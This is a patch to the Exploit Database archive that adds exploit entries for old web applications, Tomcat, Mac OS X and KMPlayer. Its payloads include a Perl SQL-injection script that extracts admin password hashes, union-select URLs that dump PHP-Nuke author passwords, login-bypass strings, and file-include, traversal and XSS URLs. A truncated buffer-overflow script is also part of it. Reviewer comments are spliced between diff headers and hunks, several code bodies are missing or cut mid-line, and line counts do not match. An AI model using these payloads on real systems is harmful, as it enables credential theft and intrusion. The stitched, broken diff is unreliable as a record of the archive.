From cf9a24defe9607fdf5876e15c853994098a9993e Mon Sep 17 00:00:00 2001 
From: Offensive Security
Date: Tue, 11 Mar 2014 04:29:44 +0000
Subject: [PATCH] Updated 03_11_2014
---
files.csv | 21 ++++++++-
platforms/asp/webapps/32151.pl | 48 ++++++++++++++++++++
platforms/multiple/remote/32137.txt | 15 ++++++
platforms/multiple/remote/32138.txt | 23 ++++++++++
platforms/osx/dos/32136.html | 16 +++++++
platforms/php/webapps/32134.txt | 7 +++
platforms/php/webapps/32135.txt | 10 ++++
platforms/php/webapps/32139.txt | 9 ++++
platforms/php/webapps/32140.txt | 10 ++++
platforms/php/webapps/32141.txt | 7 +++
platforms/php/webapps/32142.php | 21 +++++++++
platforms/php/webapps/32143.txt | 13 ++++++
platforms/php/webapps/32144.txt | 9 ++++
platforms/php/webapps/32145.txt | 9 ++++
platforms/php/webapps/32146.txt | 9 ++++
platforms/php/webapps/32147.txt | 9 ++++
platforms/php/webapps/32148.txt | 9 ++++
platforms/php/webapps/32149.txt | 9 ++++
platforms/php/webapps/32150.txt | 9 ++++
platforms/windows/local/32152.py | 32 +++++++++++++
platforms/windows/{local => remote}/32132.py | 0
21 files changed, 294 insertions(+), 1 deletion(-)
create mode 100755 platforms/asp/webapps/32151.pl
create mode 100755 platforms/multiple/remote/32137.txt
create mode 100755 platforms/multiple/remote/32138.txt
create mode 100755 platforms/osx/dos/32136.html
create mode 100755 platforms/php/webapps/32134.txt
create mode 100755 platforms/php/webapps/32135.txt
create mode 100755 platforms/php/webapps/32139.txt
create mode 100755 platforms/php/webapps/32140.txt
create mode 100755 platforms/php/webapps/32141.txt
create mode 100755 platforms/php/webapps/32142.php
create mode 100755 platforms/php/webapps/32143.txt
create mode 100755 platforms/php/webapps/32144.txt
create mode 100755 platforms/php/webapps/32145.txt
create mode 100755 platforms/php/webapps/32146.txt
create mode 100755 platforms/php/webapps/32147.txt
create mode 100755 platforms/php/webapps/32148.txt
create mode 100755 platforms/php/webapps/32149.txt
create mode 100755 platforms/php/webapps/32150.txt
create mode 
100755 platforms/windows/local/32152.py
rename platforms/windows/{local => remote}/32132.py (100%)
diff --git a/files.csv b/files.csv
index cdcb83647..7735d8540 100755
--- a/files.csv
+++ b/files.csv
@@ -28911,4 +28911,23 @@ id,file,description,date,author,platform,type,port
 32129,platforms/windows/remote/32129.cpp,"BlazeVideo HDTV Player 3.5 PLF File Stack Buffer Overflow Vulnerability",2008-07-30,"fl0 fl0w",windows,remote,0
 32130,platforms/php/webapps/32130.txt,"DEV Web Management System 1.5 Multiple Input Validation Vulnerabilities",2008-07-30,Dr.Crash,php,webapps,0
 32131,platforms/php/webapps/32131.txt,"ClipSharePro <= 4.1 - Local File Inclusion",2014-03-09,"Saadi Siddiqui",php,webapps,0
-32132,platforms/windows/local/32132.py,"GetGo Download Manager 4.9.0.1982 - HTTP Response Header Buffer Overflow Remote Code Execution",2014-03-09,"Julien Ahrens",windows,local,0
+32132,platforms/windows/remote/32132.py,"GetGo Download Manager 4.9.0.1982 - HTTP Response Header Buffer Overflow Remote Code Execution",2014-03-09,"Julien Ahrens",windows,remote,0
+32134,platforms/php/webapps/32134.txt,"H0tturk Panel 'gizli.php' Remote File Include Vulnerability",2008-07-31,U238,php,webapps,0
+32135,platforms/php/webapps/32135.txt,"common solutions csphonebook 1.02 'index.php' Cross Site Scripting Vulnerability",2008-07-31,"Ghost Hacker",php,webapps,0
+32136,platforms/osx/dos/32136.html,"Apple Mac OS X 10.x CoreGraphics Multiple Memory Corruption Vulnerabilities",2008-07-31,"Michal Zalewski",osx,dos,0
+32137,platforms/multiple/remote/32137.txt,"Apache Tomcat <= 6.0.16 'RequestDispatcher' Information Disclosure Vulnerability",2008-08-01,"Stefano Di Paola",multiple,remote,0
+32138,platforms/multiple/remote/32138.txt,"Apache Tomcat <= 6.0.16 'HttpServletResponse.sendError()' Cross Site Scripting Vulnerability",2008-08-01,"Konstantin Kolinko",multiple,remote,0
+32139,platforms/php/webapps/32139.txt,"freeForum 1.7 'acuparam' Parameter Cross-Site Scripting Vulnerability",2008-08-01,ahmadbady,php,webapps,0
+32140,platforms/php/webapps/32140.txt,"PHP-Nuke Book Catalog Module 1.0 'catid' Parameter SQL Injection Vulnerability",2008-08-01,"H4ckCity Security Team",php,webapps,0
+32141,platforms/php/webapps/32141.txt,"Homes 4 Sale 'results.php' Cross Site Scripting Vulnerability",2008-08-04,"Ghost Hacker",php,webapps,0
+32142,platforms/php/webapps/32142.php,"Pligg 9.9.5 'CAPTCHA' Registration Automation Security Bypass Weakness",2008-08-02,"Micheal Brooks",php,webapps,0
+32143,platforms/php/webapps/32143.txt,"Keld PHP-MySQL News Script 0.7.1 'login.php' SQL Injection Vulnerability",2008-08-04,crimsoN_Loyd9,php,webapps,0
+32144,platforms/php/webapps/32144.txt,"Meeting Room Booking System (MRBS) 1.2.6 day.php area Parameter XSS",2008-08-04,sl4xUz,php,webapps,0
+32145,platforms/php/webapps/32145.txt,"Meeting Room Booking System (MRBS) 1.2.6 week.php area Parameter XSS",2008-08-04,sl4xUz,php,webapps,0
+32146,platforms/php/webapps/32146.txt,"Meeting Room Booking System (MRBS) 1.2.6 month.php area Parameter XSS",2008-08-04,sl4xUz,php,webapps,0
+32147,platforms/php/webapps/32147.txt,"Meeting Room Booking System (MRBS) 1.2.6 search.php area Parameter XSS",2008-08-04,sl4xUz,php,webapps,0
+32148,platforms/php/webapps/32148.txt,"Meeting Room Booking System (MRBS) 1.2.6 report.php area Parameter XSS",2008-08-04,sl4xUz,php,webapps,0
+32149,platforms/php/webapps/32149.txt,"Meeting Room Booking System (MRBS) 1.2.6 help.php area Parameter XSS",2008-08-04,sl4xUz,php,webapps,0
+32150,platforms/php/webapps/32150.txt,"UNAK-CMS 1.5 'connector.php' Local File Include Vulnerability",2008-08-04,"Sina Yazdanmehr",php,webapps,0
+32151,platforms/asp/webapps/32151.pl,"Pcshey Portal 'kategori.asp' SQL Injection Vulnerability",2008-08-04,U238,asp,webapps,0
+32152,platforms/windows/local/32152.py,"KMPlayer 3.8.0.117 - Buffer Overflow",2014-03-10,metacom,windows,local,0
diff --git a/platforms/asp/webapps/32151.pl b/platforms/asp/webapps/32151.pl
new file mode 100755
index 000000000..63a0bd0bd
--- /dev/null
+++ b/platforms/asp/webapps/32151.pl
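Review bot: Two of the new index rows disagree with the files they point at in this same commit: the `32150` row says "UNAK-CMS 1.5" while platforms/php/webapps/32150.txt states "UNAK-CMS 1.5.5 is vulnerable", and the `32141` row names 'results.php' while the proof-of-concept URL in 32141.txt is `result.php?r=`. The description column is what searches and triage tooling match on, so each row should carry the script name and version the entry itself gives, e.g. `32150,platforms/php/webapps/32150.txt,"UNAK-CMS 1.5.5 'connector.php' Local File Include Vulnerability",2008-08-04,"Sina Yazdanmehr",php,webapps,0`, with 32141 reconciled the same way once the correct filename is confirmed against its source. The added rows also jump from `32132` to `32134`; if id 32133 was withheld on purpose, a short remark in the commit message would spare the next reader from checking whether a row was dropped.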
@@ -0,0 +1,48 @@
+source: http://www.securityfocus.com/bid/30534/info
+
+Pcshey Portal is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+#!/usr/bin/perl
+#Coded By U238
+#Discovered By U238
+#mail : setuid.noexec0x1]at]hotmail.com
+#From : Türkiye / Erzincan
+#Thnx : The_BekiR - ZeberuS - Fahn - ka0x - Deep Power - Marco Almeida
+#Gretz: http://bilisimMimarileri.com
+ : http://bilgiguvenligi.gov.tr
+ Mesut Timur & Alper Canak
+
+use LWP::Simple;
+my $bekir= $ARGV[0];
+
+if(!$ARGV[0]) {
+
+print "\nExploit Options\n";
+print "\nUse:perl victim.pl [domain]\n";
+exit(0);
+}
+sleep(2);
+
+print "\n\nPlease Loading…!$bekir\n\n";
+
+$nrc=q[forum/kategori.asp?kid=26+union+select+0,1,2,parola,4,kullanici,6,7+f
+rom+uyeler+where+id=1];
+# where+id=2,3
+$zeb=get($ARGV[0].$nrc) or die print "dont worked";
+
+print "Exploit Succesful";
+
+print "Connecting..: $ARGV[0]n";
+sleep(3);
+
+$zeb=~m//&& print "admin
+hash: $baba";
+
+
+print "dont username !" if(!$baba);
+
+$zeb=~m//&& print "pass
+!!: $baba";
+print "dont pass" if(!$baba);
diff --git a/platforms/multiple/remote/32137.txt b/platforms/multiple/remote/32137.txt
new file mode 100755
index 000000000..174f4ea27
--- /dev/null
+++ b/platforms/multiple/remote/32137.txt
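Review bot: Both match expressions in the new file read `$zeb=~m//&& print "admin` and `$zeb=~m//&& print "pass`, so the pattern is empty and nothing in the 48 lines ever assigns `$baba`; the archived script therefore cannot do what its comments describe and always ends in the `dont username !` / `dont pass` branches. The empty `m//` looks like a pattern body stripped on import rather than the author's text (32138.txt and 32142.php in this commit show the same kind of gap), so the entry should be compared with the page at its `source:` line before it is kept as the canonical record. The `q[...]` literal is likewise split across two hunk lines (`...6,7+f` / `rom+uyeler...`), which is worth checking against the source at the same time. A one-line header comment recording that the file is stored as received and what was verified would make the state of the record explicit.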
@@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/30494/info
+
+Apache Tomcat is prone to a remote information-disclosure vulnerability.
+
+Remote attackers can exploit this issue to obtain the contents of sensitive files stored on the server. Information obtained may lead to further attacks.
+
+The following versions are affected:
+
+Tomcat 4.1.0 through 4.1.37
+Tomcat 5.5.0 through 5.5.26
+Tomcat 6.0.0 through 6.0.16
+
+Tomcat 3.x, 4.0.x, and 5.0.x may also be affected.
+
+http://www.example.com/page.jsp?blah=/../WEB-INF/web.xml
\ No newline at end of file
diff --git a/platforms/multiple/remote/32138.txt b/platforms/multiple/remote/32138.txt
new file mode 100755
index 000000000..eaf033fd6
--- /dev/null
+++ b/platforms/multiple/remote/32138.txt
@@ -0,0 +1,23 @@
+source: http://www.securityfocus.com/bid/30496/info
+
+Apache Tomcat is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+The issue affects the following versions:
+
+Tomcat 4.1.0 through 4.1.37
+Tomcat 5.5.0 through 5.5.26
+Tomcat 6.0.0 through 6.0.16
+
+<%@page contentType="text/html"%>
+<%
+~ // some unicode characters, that result in CRLF being printed
+~ final String CRLF = "\u010D\u010A";
+
+~ final String payload = CRLF + CRLF + "
";
+~ final String message = "Authorization is required to access " + payload;
+~ response.sendError(403, message);
+%>
diff --git a/platforms/osx/dos/32136.html b/platforms/osx/dos/32136.html
new file mode 100755
index 000000000..7ddef7dd9
--- /dev/null
+++ b/platforms/osx/dos/32136.html
@@ -0,0 +1,16 @@
+source: http://www.securityfocus.com/bid/30488/info
+
+Apple Mac OS X is prone to multiple memory-corruption vulnerabilities that affect the CoreGraphics component.
+
+Attackers can exploit these issues to execute arbitrary code in the context of the affected application or cause denial-of-service conditions.
+
+The following versions are affected:
+
+Mac OS X v10.4.11 and prior
+Mac OS X Server v10.4.11 and prior
+Mac OS X v10.5.4 and prior
+Mac OS X Server v10.5.4 and prior
+
+NOTE: These issues were previously covered in BID 30483 (Apple Mac OS X 2008-005 Multiple Security Vulnerabilities), but have been given their own record to better document them.
+
+ fuzzer by lcamtuf@coredump.cx
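Review bot: The hunk header announces 23 added lines but only 21 are visible, and the `payload` assignment runs `CRLF + CRLF + "` straight into the `";` that opens the next physical line with nothing between the quotes, so the string literal is absent from the archived copy (presumably markup stripped on import; 32142.php and 32151.pl in this commit show the same shape). The entry should be reconciled with the page at its `source:` line before it is kept as the canonical record. The only explanation of the constant is `// some unicode characters, that result in CRLF being printed`; a sentence stating why `\u010D\u010A` is used instead of a literal `\r\n` — evidently the `response.sendError` message path emits these code points as CR and LF, so a check that only looks for the literal control characters does not see them — would make the record directly useful to someone writing a detection or reviewing their own error pages. That last reading is inferred from the comment, not demonstrated by the visible code, and should be confirmed against the advisory.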

Deallocate canvas after every cycle (NULL ptr in Safari, likely exploitable in Opera)
Keep context (if combined with above, NULL ptr Firefox, likely exploitable in Opera)
Use large canvas scaling (likely exploitable in Opera, bogs down Firefox)
Return undefined values (NULL ptr Safari, may hang Opera)
Return large integers (exploitable crash in Safari, OOM/DoS elsewhere)
Skip time-consuming operations (quicker, but may miss issues)

\ No newline at end of file
diff --git a/platforms/php/webapps/32134.txt b/platforms/php/webapps/32134.txt
new file mode 100755
index 000000000..05a117749
--- /dev/null
+++ b/platforms/php/webapps/32134.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/30468/info
+
+H0tturk Panel is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit this issue to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
+
+http://www.example.com/hot/gizli.php?cfgProgDir=cmd.txt?
\ No newline at end of file
diff --git a/platforms/php/webapps/32135.txt b/platforms/php/webapps/32135.txt
new file mode 100755
index 000000000..679e009f7
--- /dev/null
+++ b/platforms/php/webapps/32135.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/30485/info
+
+The 'csphonebook' program (from common solutions) is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+This issue affects csphonebook 1.02; other versions may also be affected.
+
+
+http://www.example.com/index.php?letter=[XSS]
\ No newline at end of file
diff --git a/platforms/php/webapps/32139.txt b/platforms/php/webapps/32139.txt
new file mode 100755
index 000000000..74d7a04ad
--- /dev/null
+++ b/platforms/php/webapps/32139.txt
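Review bot: The hunk header for 32136.html promises 16 added lines, but the visible body stops at `+ fuzzer by lcamtuf@coredump.cx` and what follows (`Deallocate canvas after every cycle ...` through `Skip time-consuming operations ...`) is bare option text with no `+` markers and no markup, so the canvas fuzzer the BID entry is meant to preserve is not in this copy. Until the original markup is recovered from the `source:` link the entry documents only the advisory text, and a line such as `NOTE: fuzzer markup not recovered in this copy; see source URL` after the existing NOTE would stop a reader from assuming the file is runnable. The `osx/dos` placement also deserves a remark, since the option text itself describes crashes in Safari, Firefox and Opera rather than an OS-level condition.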
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/30509/info
+
+freeForum is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+freeForum 1.7 is vulnerable; other versions may also be affected.
+
+http://www.example.com/path/?acuparam=>"> http://www.example.com/path/index.php/>'> http://www.example.com/path/index.php?acuparam=>">
\ No newline at end of file
diff --git a/platforms/php/webapps/32140.txt b/platforms/php/webapps/32140.txt
new file mode 100755
index 000000000..87faba42d
--- /dev/null
+++ b/platforms/php/webapps/32140.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/30511/info
+
+
+The Book Catalog module for PHP-Nuke is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/modules.php?name=BookCatalog&op=category&catid=1+-9+union+select+1,pwd+from+nuke_authors
+http://www.example.com/modules.php?name=BookCatalog&op=category&catid=1+-9+union+select+1,aid+from+nuke_authors
+
diff --git a/platforms/php/webapps/32141.txt b/platforms/php/webapps/32141.txt
new file mode 100755
index 000000000..59de37827
--- /dev/null
+++ b/platforms/php/webapps/32141.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/30517/info
+
+Homes 4 Sale is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+http://www.example.com/result.php?r=c%253E%255BHWtZYeidnW%257BdH%253A1MnOwcR%253E%253E%2527tfbsdi%2560uzqf%253Etfbsdi%2527f%253Ebtl%253CTB%253C67%253C2% 253C2%253C498984%253Ctuzmf2%256067%252Fdtt%253C3%253Cjoufsdptnpt%2560bggjmjbuf%25602%2560e3s%2560efsq%253Cksfct31%253Cksfct31%253C93454%253C43642%253Cbtl %253C%253C0e0tfbsdi0q0joufsdptnpt0ynm0epnbjomboefs0joum0e3s0gfg0qpqdbu0w30%253Cqbslfe%252Ftzoejdbujpo%252Fbtl%252Fdpn%2527jqvb%2560je%253E%253A%253A597&K eywords=
\ No newline at end of file
diff --git a/platforms/php/webapps/32142.php b/platforms/php/webapps/32142.php
new file mode 100755
index 000000000..9e40dd99b
--- /dev/null
+++ b/platforms/php/webapps/32142.php
@@ -0,0 +1,21 @@
+source: http://www.securityfocus.com/bid/30518/info
+
+Pligg is prone to a security-bypass weakness.
+
+Successfully exploiting this issue will allow an attacker to register multiple new users through an automated process. This may lead to other attacks.
+
+Pligg 9.9.5 is vulnerable; other versions may also be affected.
+
+
\ No newline at end of file
diff --git a/platforms/php/webapps/32143.txt b/platforms/php/webapps/32143.txt
new file mode 100755
index 000000000..9f791cd52
--- /dev/null
+++ b/platforms/php/webapps/32143.txt
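Review bot: The hunk header for 32142.php says the file adds 21 lines, but the hunk shows only the advisory header (source line, three paragraphs and blank lines) before `\ No newline at end of file`, so the PHP body that the `.php` extension and the "Registration Automation Security Bypass" description refer to is missing from the archived copy. Whether it was dropped on import or never present in the source cannot be told from here; the entry should be checked against its `source:` link, and if the code is intentionally left out the file should say so in a line after the description, e.g. `NOTE: proof-of-concept code not included; see source URL`, rather than end silently. A file with no code should also not carry a `.php` extension in files.csv, since that is what downstream consumers use to decide what the entry contains.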
@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/30529/info
+
+Keld PHP-MySQL News Script is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Keld PHP-MySQL News Script 0.7.1 is vulnerable; other versions may also be affected.
+
+The following proofs of concept are available:
+
+A. admin' OR 1=1/*
+B. fdfds' OR 1=1 limit x/*
+C.' AND 1=2 union select 1,2/*
\ No newline at end of file
diff --git a/platforms/php/webapps/32144.txt b/platforms/php/webapps/32144.txt
new file mode 100755
index 000000000..92b884d66
--- /dev/null
+++ b/platforms/php/webapps/32144.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/30531/info
+
+MRBS (Meeting Room Booking Software) is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+MRBS 1.2.6 is vulnerable; other versions may also be affected.
+
+http://www.example.com/path/day.php?area=[XSS]
\ No newline at end of file
diff --git a/platforms/php/webapps/32145.txt b/platforms/php/webapps/32145.txt
new file mode 100755
index 000000000..a46ca99d2
--- /dev/null
+++ b/platforms/php/webapps/32145.txt
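Review bot: 32144.txt through 32149.txt are six copies of the same three paragraphs under the same `source:` BID, differing only in the script named in the final URL (`day.php`, `week.php`, `month.php`, `search.php`, `report.php`, `help.php`); the `area` parameter and all advisory text are identical. One entry listing the six affected scripts would be easier to keep consistent than six files that must be edited together whenever the wording changes; if the one-file-per-id layout is imposed by files.csv, each copy should at least name its script in the body, e.g. `This entry covers the 'area' parameter of day.php.`, so the files can be told apart without reading the last line. The same remark applies to the 32145–32149 hunks on the following lines.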
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/30531/info
+
+MRBS (Meeting Room Booking Software) is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+MRBS 1.2.6 is vulnerable; other versions may also be affected.
+
+http://www.example.com/path/week.php?area=[XSS]
\ No newline at end of file
diff --git a/platforms/php/webapps/32146.txt b/platforms/php/webapps/32146.txt
new file mode 100755
index 000000000..97e45e8d9
--- /dev/null
+++ b/platforms/php/webapps/32146.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/30531/info
+
+MRBS (Meeting Room Booking Software) is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+MRBS 1.2.6 is vulnerable; other versions may also be affected.
+
+http://www.example.com/path/month.php?area=[XSS]
\ No newline at end of file
diff --git a/platforms/php/webapps/32147.txt b/platforms/php/webapps/32147.txt
new file mode 100755
index 000000000..51332c73d
--- /dev/null
+++ b/platforms/php/webapps/32147.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/30531/info
+
+MRBS (Meeting Room Booking Software) is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+MRBS 1.2.6 is vulnerable; other versions may also be affected.
+
+http://www.example.com/path/search.php?area=[XSS]
\ No newline at end of file
diff --git a/platforms/php/webapps/32148.txt b/platforms/php/webapps/32148.txt
new file mode 100755
index 000000000..21735cba9
--- /dev/null
+++ b/platforms/php/webapps/32148.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/30531/info
+
+MRBS (Meeting Room Booking Software) is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+MRBS 1.2.6 is vulnerable; other versions may also be affected.
+
+http://www.example.com/path/report.php?area=[XSS]
\ No newline at end of file
diff --git a/platforms/php/webapps/32149.txt b/platforms/php/webapps/32149.txt
new file mode 100755
index 000000000..11b3133de
--- /dev/null
+++ b/platforms/php/webapps/32149.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/30531/info
+
+MRBS (Meeting Room Booking Software) is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+MRBS 1.2.6 is vulnerable; other versions may also be affected.
+
+http://www.example.com/path/help.php?area=[XSS]
\ No newline at end of file
diff --git a/platforms/php/webapps/32150.txt b/platforms/php/webapps/32150.txt
new file mode 100755
index 000000000..0f84a2237
--- /dev/null
+++ b/platforms/php/webapps/32150.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/30533/info
+
+UNAK-CMS is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit this vulnerability using directory-traversal strings to view local files within the context of the webserver process. Information harvested may aid in further attacks.
+
+UNAK-CMS 1.5.5 is vulnerable; other versions may also be affected.
+
+http://www.example.com/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php?Dirroot=/file.type%00
\ No newline at end of file
diff --git a/platforms/windows/local/32152.py b/platforms/windows/local/32152.py
new file mode 100755
index 000000000..40c6af13a
--- /dev/null
+++ b/platforms/windows/local/32152.py
@@ -0,0 +1,32 @@
+#!/usr/bin/python
+# KMPlayer 3.8.0.117 Buffer Overflow
+# Author: metacom
+# Tested on: Windows Xp pro-sp3 En
+# Download link :http://www.chip.de/downloads/KMPlayer_33859258.html
+# Version: 3.8.0.117 Kmp Plus
+# Howto / Notes:
+# Run KMPlayer Playlist Editor > New Album and paste Exploit Code
+import struct
+def little_endian(address):
+ return struct.pack("